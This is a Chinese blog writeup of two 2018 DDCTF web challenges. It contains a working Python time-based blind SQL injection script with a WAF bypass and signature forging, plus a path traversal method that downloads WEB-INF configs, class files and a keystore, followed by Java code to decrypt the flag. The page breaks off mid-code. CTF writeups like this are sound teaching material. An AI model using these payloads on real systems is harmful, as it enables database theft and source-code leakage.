<!DOCTYPE html>
<html  lang="zh">
<head>
    <meta charset="utf-8">
<title>2018 DDCTF Web 部分writeup - Junay的博客</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />



    <meta name="description" content="前言&amp;emsp;&amp;emsp;滴滴的web题感觉质量还是挺高的，因为每一道题自己做得都比较吃力（菜鸟自白）。。。但更重要的是自己也从每道题中学习到了新知识，这种感觉甚至胜过拿到flag的喜悦…..">
<meta name="keywords" content="hexo,javascript">
<meta property="og:type" content="article">
<meta property="og:title" content="2018 DDCTF Web 部分writeup">
<meta property="og:url" content="http://yoursite.com/2018/04/ddctf-writeup2/index.html">
<meta property="og:site_name" content="Junay的博客">
<meta property="og:description" content="前言&amp;emsp;&amp;emsp;滴滴的web题感觉质量还是挺高的，因为每一道题自己做得都比较吃力（菜鸟自白）。。。但更重要的是自己也从每道题中学习到了新知识，这种感觉甚至胜过拿到flag的喜悦…..">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/13.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/14.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/16.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/15.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/17.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/18.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/19.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/20.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/21.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/22.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/23.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/24.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/25.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/26.png">
<meta property="og:image" content="http://yoursite.com/images/posts/ddctf/27.png">
<meta property="og:updated_time" content="2018-11-23T12:43:48.094Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2018 DDCTF Web 部分writeup">
<meta name="twitter:description" content="前言&amp;emsp;&amp;emsp;滴滴的web题感觉质量还是挺高的，因为每一道题自己做得都比较吃力（菜鸟自白）。。。但更重要的是自己也从每道题中学习到了新知识，这种感觉甚至胜过拿到flag的喜悦…..">
<meta name="twitter:image" content="http://yoursite.com/images/posts/ddctf/13.png">





<link rel="icon" href="/images/favicon.png">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.4.1/css/all.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
    
    <style>body>.footer,body>.navbar,body>.section{opacity:0}</style>
    

    
    
    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">
    

    
    

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">


    
    
    
    

<link rel="stylesheet" href="/css/back-to-top.css">


    
    

    
    
    
    

    
    
<link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

    


<link rel="stylesheet" href="/css/style.css">
</head>
<body class="is-3-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/logo.svg" alt="2018 DDCTF Web 部分writeup" height="28">
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item"
                href="/">Home</a>
                
                <a class="navbar-item"
                href="/archives">Archives</a>
                
                <a class="navbar-item"
                href="/categories">Categories</a>
                
                <a class="navbar-item"
                href="/tags">Tags</a>
                
                <a class="navbar-item"
                href="/about/index.html">About</a>
                
            </div>
            
            <div class="navbar-end">
                
                    
                    
                    <a class="navbar-item" target="_blank" title="Download on GitHub" href="https://github.com/delcoding">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                    
                
                
                
                <a class="navbar-item search" title="搜索" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>
    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-6-widescreen has-order-2 column-main"><div class="card">
    
    <div class="card-content article ">
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2018-04-20T14:47:56.000Z">2018-04-20</time>
                
                <div class="level-item">
                <a class="has-link-grey -link" href="/categories/jekyll-update/">jekyll update</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    
                    
                    17 分钟 读完 (大约 2493 个字)
                </span>
                
            </div>
        </div>
        
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                2018 DDCTF Web 部分writeup
            
        </h1>
        <div class="content">
            <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>&emsp;&emsp;滴滴的web题感觉质量还是挺高的，因为每一道题自己做得都比较吃力（菜鸟自白）。。。但更重要的是自己也从每道题中学习到了新知识，这种感觉甚至胜过拿到flag的喜悦…..<br><a id="more"></a></p>
<h3 id="数据库的秘密"><a href="#数据库的秘密" class="headerlink" title="数据库的秘密"></a>数据库的秘密</h3><p>&emsp;&emsp;打开网站后进行简单的探索，可以发现有一个隐藏的<code>input</code>表单项，还有前端使用了<code>sha1</code>对传递的数据进行签名和加上时间戳。</p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/13.png" height="60%"><br></div><br>&emsp;&emsp;当然最大的障碍是防火墙。</p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/14.png" height="60%"><br></div><br>&emsp;&emsp;经过一天的不断尝试和搜索后终于得到了<code>POC</code>，利用方式有两点：</p>
<ul>
<li><strong>1、使用enctype=”multipart/form-data”方式提交表单防火墙不拦截</strong></li>
<li><strong>2、隐藏的author表项不会对’(单引号)进行转义</strong></li>
</ul>
<p><div align="center"><br>    <img src="/images/posts/ddctf/16.png" height="60%"><br></div></p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/15.png" height="60%"><br></div><br>&emsp;&emsp;为了让python跑起来我们需要了解它的签名过程，通过<code>js调试</code>后我们可以得到它的签名原理。</p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/17.png" height="60%"><br></div><br>&emsp;&emsp;所以我们的python脚本就可以这样写：<br><figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="hljs-keyword">import</span> requests</span><br><span class="line"><span class="hljs-keyword">import</span> hashlib</span><br><span class="line"><span class="hljs-keyword">import</span> time</span><br><span class="line"></span><br><span class="line">sql = <span class="hljs-string">'admin\' or if(ascii(substr((select secvalue from ctf_key8 limit 0,1),&#123;0&#125;,1))=&#123;1&#125;,sleep(5),0) -- +'</span></span><br><span class="line"></span><br><span class="line">hs = <span class="hljs-string">'id=title=author=&#123;0&#125;date=time=&#123;1&#125;adrefkfweodfsdpiru'</span></span><br><span class="line"></span><br><span class="line">url = <span class="hljs-string">'http://116.85.43.88:8080/JYDJAYLYIPHCJMOQ/dfe3ia/index.php?sig=&#123;&#125;&amp;time=&#123;&#125;'</span></span><br><span class="line">header = &#123;</span><br><span class="line">    <span class="hljs-string">'X-Forwarded-For'</span> : <span class="hljs-string">'123.232.23.245'</span>,</span><br><span class="line">&#125;</span><br><span class="line">table = <span class="hljs-string">''</span></span><br><span class="line">tt = <span class="hljs-keyword">True</span></span><br><span class="line"><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">1</span>, <span class="hljs-number">50</span>):</span><br><span class="line">    <span class="hljs-keyword">if</span> tt:</span><br><span class="line">        <span class="hljs-keyword">for</span> ch <span class="hljs-keyword">in</span> range(<span class="hljs-number">33</span>, <span class="hljs-number">128</span>):</span><br><span class="line">            <span class="hljs-comment"># print('now: ' + str(ch))</span></span><br><span class="line">            <span class="hljs-keyword">if</span> ch == <span class="hljs-number">127</span>:</span><br><span class="line">                tt = <span class="hljs-keyword">False</span></span><br><span class="line">            te = str(int(time.time()))</span><br><span class="line">            sqli = sql.format(i, str(ch))</span><br><span class="line">            data = &#123;</span><br><span class="line">                <span class="hljs-comment"># 这里是为了生成的form-data的参数是name，如果不加因为是files参数，格</span></span><br><span class="line">                <span class="hljs-comment">#式化的时候就会变成filename，但这并不是我们想要的，自己实际操作一下就知道了。</span></span><br><span class="line">                <span class="hljs-string">'id'</span>: (<span class="hljs-keyword">None</span>, <span class="hljs-string">''</span>), </span><br><span class="line">                <span class="hljs-string">'title'</span>: (<span class="hljs-keyword">None</span>, <span class="hljs-string">''</span>),</span><br><span class="line">                <span class="hljs-string">'author'</span>: (<span class="hljs-keyword">None</span>, sqli),</span><br><span class="line">                <span class="hljs-string">'time'</span>: (<span class="hljs-keyword">None</span>, te),</span><br><span class="line">            &#125;</span><br><span class="line">            proxies = &#123; <span class="hljs-string">"http"</span>: <span class="hljs-string">"http://127.0.0.1:8080"</span>, <span class="hljs-string">"https"</span>: <span class="hljs-string">"http://127.0.0.1:8080"</span>&#125;</span><br><span class="line">            sig = hashlib.sha1(hs.format(sqli,te)).hexdigest()</span><br><span class="line">            t_url = url.format(sig, te)</span><br><span class="line">            <span class="hljs-comment"># print(t_url)</span></span><br><span class="line">            <span class="hljs-keyword">try</span>:</span><br><span class="line">                html = requests.post(t_url, files=data, headers=header, timeout=<span class="hljs-number">3</span>)</span><br><span class="line">            <span class="hljs-keyword">except</span>:</span><br><span class="line">                table += chr(ch)</span><br><span class="line">                print(table)</span><br><span class="line">                <span class="hljs-keyword">break</span></span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">else</span>:</span><br><span class="line">        <span class="hljs-keyword">break</span></span><br></pre></td></tr></table></figure></p>
<p>&emsp;&emsp;flag：<code>DDCTF{IKIDLHNZMKFUDEQE}</code>。</p>
<h3 id="专属链接"><a href="#专属链接" class="headerlink" title="专属链接"></a>专属链接</h3><p>&emsp;&emsp;题目描述：<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">现在，你拿到了滴滴平台为你同学生成的专属登录链接，但是你能进一步拿到专属他的秘密flag么</span><br><span class="line"></span><br><span class="line">提示1：虽然原网站跟本次CTF没有关系，原网站是www.xiaojukeji.com</span><br><span class="line"></span><br><span class="line">注：题目采用springmvc+mybatis编写，链接至其他域名的链接与本次CTF无关，请不要攻击</span><br><span class="line"></span><br><span class="line">http://116.85.48.102:5050/welcom/3fca5965sd7b7s4a71s88c7se658165a791e</span><br></pre></td></tr></table></figure></p>
<p>&emsp;&emsp;打开链接后发现并没有什么业务，都是些从原网站挪过来的模板，这里也纠结了好一会，经过一番比对后，可以发现用于标签页的<code>favicon.ico</code>有人为涂抹的痕迹。在源代码中打开后发现就直接下载了。</p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/18.png" height="60%"><br></div><br>&emsp;&emsp;用<code>winhex</code>打开后，果然发现了信息。</p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/19.png" height="60%"><br></div><br>&emsp;&emsp;通过这个信息，我们可以猜测是源码泄露（文件下载）。而因为网站框架是基于java的<code>spring</code>，它相关的源码泄露可以参考：</p>
<blockquote>
<p>/WEB-INF/web.xml：Web应用程序配置文件，描述了 servlet 和其他的应用组件配置及命名规则。</p>
</blockquote>
<blockquote>
<p>/WEB-INF/classes/：含了站点所有用的 class 文件，包括 servlet class 和非servlet class，他们不能包含在 .jar文件</p>
</blockquote>
<blockquote>
<p>/WEB-INF/lib/：存放web应用需要的各种JAR文件，放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件</p>
</blockquote>
<blockquote>
<p>/WEB-INF/src/：源码目录，按照包名结构放置各个java文件。</p>
</blockquote>
<blockquote>
<p>/WEB-INF/database.properties：数据库配置文件</p>
</blockquote>
<p>&emsp;&emsp;但是发现如果直接拼接<code>WEB-INF/web.xml</code>却没有该地址，后来再回去看看下载<code>favicon.ico</code>的链接，发现最后是<code>base64</code>编码过的。</p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/20.png"><br></div><br>&emsp;&emsp;所以我们猜测需要后面拼接<code>base64</code>编码的字符，我们把<code>../../WEB-INF/web.xml</code>（注意<code>../</code>）进行编码后拼接访问，发现确实可以造成文件下载。下载后就开始了<code>顺藤摸瓜</code>的操作了。</p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/21.png"><br></div><br>&emsp;&emsp;我们根据得到的<code>applicationContext.xml</code>的位置，继续下载。然后可以从这个文件中得到<code>mybatis/config.xml</code>的地址。</p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/22.png" height="60%"><br></div><br>&emsp;&emsp;关于<code>.xml</code>文件的下载就介绍到这，其余的文件按照同样的操作就能找到，注意的地方就是<code>路径</code>。</p>
<p>&emsp;&emsp;接下来就是下载<code>.class</code>文件，从<code>applicationContext.xml</code>中可以发现程序开始运行的接口类（应该可以这样说吧，，，java web不熟）。</p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/23.png" height="80%"><br></div><br>&emsp;&emsp;一开始由于没有接触过<code>java web</code>的框架，更不熟悉java的类包管理方法，所以碰了挺久壁的。如果你按<code>../../WEB-INF/classes/InitListener.class</code>下载是不行的，正确的方法是<code>classes</code>后面按照该类的导入方式依次拼接路径，比如这道题的正确路径就是：<code>../../WEB-INF/classes/com/didichuxing/ctf/listener/InitListener.class</code>。</p>
<blockquote>
<p>需要注意一定要找到<code>类</code>，而不能下载<code>包</code>。</p>
</blockquote>
<p>&emsp;&emsp;下载的<code>.class</code>文件需要进行反编译成<code>.java</code>文件，这个很多在线网站都能做。</p>
<p>&emsp;&emsp;其余文件按照上面所述的方法都可以找到并下载，完了以后能拿到的文件如下：</p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/24.png" height="70%"><br></div><br>&emsp;&emsp;下面就是代码审计的时候了。</p>
<p>&emsp;&emsp;首先需要关注的就是<code>FlagController.java</code>文件，它起到路由的作用。<br><figure class="highlight java hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">@RequestMapping</span>(&#123;<span class="hljs-string">"flag"</span>&#125;)   <span class="hljs-comment">// 定义根路径</span></span><br><span class="line"><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">FlagController</span></span></span><br><span class="line"><span class="hljs-class"></span>&#123;</span><br><span class="line">  <span class="hljs-meta">@Autowired</span></span><br><span class="line">  <span class="hljs-keyword">private</span> FlagService flagService;</span><br><span class="line">  </span><br><span class="line">  <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-title">FlagController</span><span class="hljs-params">()</span> </span>&#123;&#125;</span><br><span class="line">  </span><br><span class="line">  <span class="hljs-comment">// 接收类似 /flag/getflag/1111路径 用post请求</span></span><br><span class="line">  <span class="hljs-meta">@RequestMapping</span>(value=&#123;<span class="hljs-string">"/getflag/&#123;email:[0-9a-zA-Z']+&#125;"</span>&#125;, method=&#123;org.springframework.web.bind.annotation.RequestMethod.POST&#125;)</span><br><span class="line">  <span class="hljs-function"><span class="hljs-keyword">public</span> String <span class="hljs-title">getFlag</span><span class="hljs-params">(@PathVariable(<span class="hljs-string">"email"</span>)</span> String email, ModelMap model)</span></span><br><span class="line"><span class="hljs-function">  </span>&#123;</span><br><span class="line">    Flag flag = flagService.getFlagByEmail(email);</span><br><span class="line">    <span class="hljs-keyword">return</span> <span class="hljs-string">"Encrypted flag : "</span> + flag.getFlag();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="hljs-meta">@RequestMapping</span>(&#123;<span class="hljs-string">"/testflag/&#123;flag&#125;"</span>&#125;)</span><br><span class="line">  <span class="hljs-function"><span class="hljs-keyword">public</span> String <span class="hljs-title">submitFlag</span><span class="hljs-params">(@PathVariable(<span class="hljs-string">"flag"</span>)</span> String flag, ModelMap model)</span></span><br><span class="line"><span class="hljs-function">  </span>&#123;</span><br><span class="line">    String[] fs = flag.split(<span class="hljs-string">"[&#123;&#125;]"</span>);</span><br><span class="line">    Long longFlag = Long.valueOf(fs[<span class="hljs-number">1</span>]);</span><br><span class="line">    <span class="hljs-keyword">int</span> i = flagService.exist(flag);</span><br><span class="line">    <span class="hljs-keyword">if</span> (i &gt; <span class="hljs-number">0</span>) &#123;</span><br><span class="line">      <span class="hljs-keyword">return</span> <span class="hljs-string">"pass!!!"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="hljs-keyword">return</span> <span class="hljs-string">"failed!!!"</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>&emsp;&emsp;这里的<code>email</code>是我们进入时系统分配的，在首页的右上角能找到。</p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/25.png" height="70%"><br></div><br>&emsp;&emsp;接着我们来拿到我们的<code>加密</code>后的<code>flag</code>。</p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/26.png" height="50%"><br></div><br>&emsp;&emsp;按照我们的第一感觉你会发现根本不按套路走，我的第一感觉是会不会真是系统错误，但跟客服姐姐交流后发现这是正常的，为了解决这个问题，只能将全部源码审计一边，最终找到了原因。</p>
<p>&emsp;&emsp;在<code>InitListener.java</code>里我们可以看到关于<code>email、flag</code>的定义。下面是截取的部分代码：<br><figure class="highlight java hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">SecretKeySpec signingKey = <span class="hljs-keyword">new</span> SecretKeySpec(<span class="hljs-string">"sdl welcome you !"</span>.getBytes(), <span class="hljs-string">"HmacSHA256"</span>);</span><br><span class="line">Mac mac = Mac.getInstance(<span class="hljs-string">"HmacSHA256"</span>);</span><br><span class="line">mac.init(signingKey);</span><br><span class="line"><span class="hljs-keyword">byte</span>[] e = mac.doFinal(String.valueOf(email.trim()).getBytes());</span><br><span class="line"></span><br><span class="line">Flag flago = <span class="hljs-keyword">new</span> Flag();</span><br><span class="line">flago.setId(Integer.valueOf(id));</span><br><span class="line">flago.setFlag(byte2hex(data));</span><br><span class="line">flago.setEmail(byte2hex(e));   # 设置email的值</span><br><span class="line">flago.setOriginFlag(flag);</span><br><span class="line">flago.setUuid(uuid);</span><br><span class="line">flago.setOriginEmail(email);</span><br></pre></td></tr></table></figure></p>
<p>&emsp;&emsp;所以我们可以看到实际的<code>email</code>是经过加密的，而不是表面的。所以写个同样的java代码得到实际的<code>email</code>。<br><figure class="highlight java hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">import</span> java.io.*;</span><br><span class="line"><span class="hljs-keyword">import</span> javax.crypto.spec.SecretKeySpec;</span><br><span class="line"><span class="hljs-keyword">import</span> javax.crypto.Mac;</span><br><span class="line"><span class="hljs-keyword">import</span> java.security.Key;</span><br><span class="line"></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test</span>  </span></span><br><span class="line"><span class="hljs-class"></span>&#123;</span><br><span class="line">    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span> <span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> java.lang.Exception</span></span><br><span class="line"><span class="hljs-function">    </span>&#123;</span><br><span class="line">        System.out.println(<span class="hljs-string">"hi"</span>);</span><br><span class="line">        SecretKeySpec signingKey = <span class="hljs-keyword">new</span> SecretKeySpec(<span class="hljs-string">"sdl welcome you !"</span>.getBytes(), <span class="hljs-string">"HmacSHA256"</span>);</span><br><span class="line">        Mac mac = Mac.getInstance(<span class="hljs-string">"HmacSHA256"</span>);</span><br><span class="line">        mac.init(signingKey);</span><br><span class="line">        String email = <span class="hljs-string">"3113936212117314317@didichuxing.com"</span>;   <span class="hljs-comment">// 首页得到的email</span></span><br><span class="line">        <span class="hljs-keyword">byte</span>[] e = mac.doFinal(String.valueOf(email.trim()).getBytes());</span><br><span class="line">        System.out.println(e);</span><br><span class="line">        String tmp1 = byte2hex(e);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>&emsp;&emsp;我们将得到的值提交。</p>
<p><div align="center"><br>    <img src="/images/posts/ddctf/27.png" height="50%"><br></div><br>&emsp;&emsp;现在我们就得到了属于自己的加密后的flag。接下来就是分析flag的加密方法，然后进行相应的解密。下面是相应的加密代码（截取部分）：<br><figure class="highlight java hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">String p = <span class="hljs-string">"sdl welcome you !"</span>.substring(<span class="hljs-number">0</span>, <span class="hljs-string">"sdl welcome you !"</span>.length() - <span class="hljs-number">1</span>).trim().replace(<span class="hljs-string">" "</span>, <span class="hljs-string">""</span>);</span><br><span class="line"></span><br><span class="line"><span class="hljs-comment">// 这里是得到sdl.ks的绝对路径</span></span><br><span class="line">String ksPath = ctx.getServletContext().getRealPath(<span class="hljs-string">"/WEB-INF/classes/sdl.ks"</span>);</span><br><span class="line">KeyStore keyStore = KeyStore.getInstance(KeyStore.getDefaultType());</span><br><span class="line"></span><br><span class="line"><span class="hljs-comment">// 加载密钥文件</span></span><br><span class="line">FileInputStream inputStream = <span class="hljs-keyword">new</span> FileInputStream(ksPath);</span><br><span class="line">keyStore.load(inputStream, p.toCharArray());</span><br><span class="line">Key key = keyStore.getKey(<span class="hljs-string">"www.didichuxing.com"</span>, p.toCharArray());</span><br><span class="line"></span><br><span class="line"><span class="hljs-comment">// 选择加密算法，这里是 RSA 加密算法</span></span><br><span class="line">Cipher cipher = Cipher.getInstance(key.getAlgorithm());</span><br><span class="line"></span><br><span class="line"><span class="hljs-comment">// 1：代表加密模式； 2：代表解密模式</span></span><br><span class="line">cipher.init(<span class="hljs-number">1</span>, key);</span><br><span class="line"><span class="hljs-keyword">byte</span>[] data = cipher.doFinal(flag.getBytes());</span><br><span class="line"></span><br><span class="line"><span class="hljs-comment">// 设置flag</span></span><br><span class="line">flago.setFlag(byte2hex(data));</span><br></pre></td></tr></table></figure></p>
<p>&emsp;&emsp;分析了<code>flag</code>的加密算法后，我们就来写下解密算法。密钥文件<code>sdl.ks</code>的下载这里就不赘述了。并且这道题是属于：<code>私钥加密，公钥解密</code>的一个类型。</p>
<p>&emsp;&emsp;由于对java的加解密库的函数不了解，也怪自己搜索的关键字不好，，这里卡了好一会。。。终于在某天早上起床后，，脑瓜子灵光一闪，想到了一些关键字，然后在google结果的第二条就找到了解决方法。下面是解密脚本：<br><figure class="highlight java hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">import</span> java.io.*;</span><br><span class="line"><span class="hljs-keyword">import</span> java.security.PublicKey;</span><br><span class="line"><span class="hljs-keyword">import</span> java.security.KeyStore;</span><br><span class="line"><span class="hljs-keyword">import</span> java.security.cert.Certificate;</span><br><span class="line"><span class="hljs-keyword">import</span> javax.crypto.Cipher;</span><br><span class="line"></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test</span>  </span></span><br><span class="line"><span class="hljs-class"></span>&#123;</span><br><span class="line">    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span> <span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> java.lang.Exception</span></span><br><span class="line"><span class="hljs-function">    </span>&#123;</span><br><span class="line">        String ksPath = <span class="hljs-string">"e:/WEB-INF_classes_sdl.ks"</span>;</span><br><span class="line">        String p = <span class="hljs-string">"sdl welcome you !"</span>.substring(<span class="hljs-number">0</span>, <span class="hljs-string">"sdl welcome you !"</span>.length() - <span class="hljs-number">1</span>).trim().replace(<span class="hljs-string">" "</span>, <span class="hljs-string">""</span>);</span><br><span class="line"></span><br><span class="line">        System.out.println(KeyStore.getDefaultType());   <span class="hljs-comment">// jks</span></span><br><span class="line">        KeyStore keyStore = KeyStore.getInstance(KeyStore.getDefaultType());</span><br><span class="line">        FileInputStream inputStream = <span class="hljs-keyword">new</span> FileInputStream(ksPath);</span><br><span class="line">        keyStore.load(inputStream, p.toCharArray());</span><br><span class="line"></span><br><span class="line">        Certificate publicCertificate = keyStore.getCertificate(<span class="hljs-string">"www.didichuxing.com"</span>);</span><br><span class="line">        PublicKey publicKey = publicCertificate.getPublicKey();</span><br><span class="line"></span><br><span class="line">        System.out.println(publicKey.getAlgorithm());   <span class="hljs-comment">// rsa</span></span><br><span class="line">        System.out.println(publicKey.getEncoded());</span><br><span class="line"></span><br><span class="line">        String  miwen = <span class="hljs-string">"506920534F89FA62C1125AABE3462F49073AB9F5C2254895534600A9242B8F18D4E420419534118D8CF9C20D07825C4797AF1A169CA83F934EF508F617C300B04242BEEA14AA4BB0F4887494703F6F50E1873708A0FE4C87AC99153DD02EEF7F9906DE120F5895DA7AD134745E032F15D253F1E4DDD6E4BC67CD0CD2314BA32660AB873B3FF067D1F3FF219C21A8B5A67246D9AE5E9437DBDD4E7FAACBA748F58FC059F662D2554AB6377D581F03E4C85BBD8D67AC6626065E2C950B9E7FBE2AEA3071DC0904455375C66A2A3F8FF4691D0C4D76347083A1E596265080FEB30816C522C6BFEA41262240A71CDBA4C02DB4AFD46C7380E2A19B08231397D099FE"</span>;</span><br><span class="line"></span><br><span class="line">        Cipher 